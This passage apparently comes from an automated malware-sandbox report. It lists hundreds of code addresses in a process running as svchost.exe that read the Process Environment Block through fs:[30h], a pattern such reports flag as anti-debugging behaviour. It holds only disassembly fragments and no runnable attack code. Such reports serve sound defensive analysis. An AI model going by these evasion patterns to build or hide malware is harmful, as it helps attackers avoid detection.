                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]2_2_0350625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]2_2_035062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]2_2_034280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0346A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]2_2_0346A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]2_2_0346C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]2_2_034666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
